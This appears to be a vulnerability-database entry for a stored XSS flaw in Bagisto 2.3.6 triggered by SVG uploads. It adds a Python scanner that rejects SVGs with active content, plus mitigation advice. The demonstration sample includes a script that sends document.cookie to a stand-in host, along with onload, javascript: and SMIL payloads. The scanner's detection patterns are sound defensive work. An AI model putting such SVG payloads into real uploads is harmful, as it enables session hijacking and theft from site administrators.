CVE-2025-60880
Published 2025-10-10
Priority: P3 · 39 · Severity: high · CVSS 3.1 base score: 8.3
Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:H
EPSS: 0.39% (30.7th percentile)
An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path: an attacker with an admin (product-creation) account can upload a crafted SVG file containing JavaScript, and the file is stored and later served from the shop's own origin. When another admin opens the stored SVG as a document (for example by following its URL), the embedded script executes in that admin's browser, which can lead to session hijacking, data theft, or unauthorized actions performed with the victim's privileges. Note that browsers do not run scripts in an SVG rendered through an <img> element; the exposure comes from the file being served inline as image/svg+xml under the site's origin, which is why the CVSS vector records high privileges required (PR:H), user interaction (UI:R) and a scope change (S:C).
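The practical control for this class of bug is to refuse SVG uploads that carry active content, before the file ever reaches storage. Below is an added example of such a pre-storage check written for this page; it is not Bagisto's own code and does not reproduce the 2.3.7 fix. It parses the upload as XML (a browser will not render a malformed SVG anyway), rejects DOCTYPE declarations outright, and flags the constructs that execute or animate script when the file is opened directly: `<script>` and `<foreignObject>` elements, `on*` event-handler attributes, `javascript:`/`data:` URLs in `href`/`src` and SMIL `from`/`to`/`values`, SMIL `<set>`/`<animate>` elements that rewrite an event handler or `href` at render time, and non-fragment `url()` references in CSS. The two sample SVG documents are constructed for the demonstration; the names `scan_svg` and `is_safe_svg` are this example's own.

```python
"""Added example: reject script-bearing SVG uploads (not Bagisto project code)."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Elements that embed executable or foreign (HTML) content in an SVG document.
ACTIVE_ELEMENTS = {"script", "foreignObject"}
# SMIL animation elements can set attributes such as onload= or href= at render time.
ANIMATION_ELEMENTS = {"set", "animate", "animateTransform", "animateMotion"}
# Attributes whose value may carry a URL, including SMIL animation values.
URL_ATTRIBUTES = {"href", "src", "from", "to", "values"}
ACTIVE_SCHEME_RE = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)
# url(...) that does not point at an in-document fragment (#id), or expression(...)
EXTERNAL_CSS_RE = re.compile(r"url\s*\(\s*['\"]?\s*(?!#)|expression\s*\(", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list[str]:
    """Return a list of findings for an SVG upload; an empty list means nothing active was found."""
    # A scanner should never expand entities: refuse any DOCTYPE before parsing.
    if re.search(rb"<!DOCTYPE", data, re.IGNORECASE):
        return ["DOCTYPE declaration present (entity expansion risk)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings: list[str] = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")

    for el in root.iter():  # includes the root itself
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        if name == "style" and el.text and EXTERNAL_CSS_RE.search(el.text):
            findings.append("<style> element with external url()/expression()")

        attrs = {_local(k): v for k, v in el.attrib.items()}
        if name in ANIMATION_ELEMENTS:
            target = attrs.get("attributeName", "")
            if target.lower().startswith("on") or target == "href":
                findings.append(f"<{name}> animates {target!r}")
        for aname, value in attrs.items():
            if aname.lower().startswith("on"):
                findings.append(f"event handler {aname}= on <{name}>")
            elif aname in URL_ATTRIBUTES and ACTIVE_SCHEME_RE.match(value):
                findings.append(f"{aname}= with active URL scheme on <{name}>")
            elif aname == "style" and EXTERNAL_CSS_RE.search(value):
                findings.append(f"style= with external url()/expression() on <{name}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """True only when the upload parses as SVG and carries no active content."""
    return not scan_svg(data)


# Constructed samples for the demonstration (not real uploads).
SAMPLE_MALICIOUS = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.cookie)">
  <script>fetch('https://example.invalid/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="20">click</text></a>
  <set attributeName="onmouseover" to="alert(1)"/>
</svg>"""

SAMPLE_BENIGN = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <defs><linearGradient id="g"><stop offset="0" stop-color="red"/></linearGradient></defs>
  <rect width="10" height="10" fill="url(#g)" style="stroke:url(#g)"/>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, "->", scan_svg(sample) or "no findings")
```

Treat any finding as grounds to reject the upload rather than to strip the offending nodes: sanitizers that rewrite SVG are easy to bypass, and a product image has no legitimate need for script. Independently of the upload check, the stored files should be served with a Content-Security-Policy that forbids script (or with `Content-Disposition: attachment`) so that a file which slips through cannot execute in the shop's origin. For the version actually affected here, the remedy on the page is the upgrade to 2.3.7 listed in the Affected table.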
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bagisto | bagisto | >= 2.3.6 < 2.3.7 | 2.3.7 |
| webkul | bagisto | — | — |
GHSA (2025-10-10)
CVE-2025-60880 [HIGH] CWE-79: Bagisto is vulnerable to XSS through Admin Panel's product creation path
OSV (2025-10-10)
CVE-2025-60880 [HIGH]: Bagisto is vulnerable to XSS through Admin Panel's product creation path
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
Published: 2025-10-10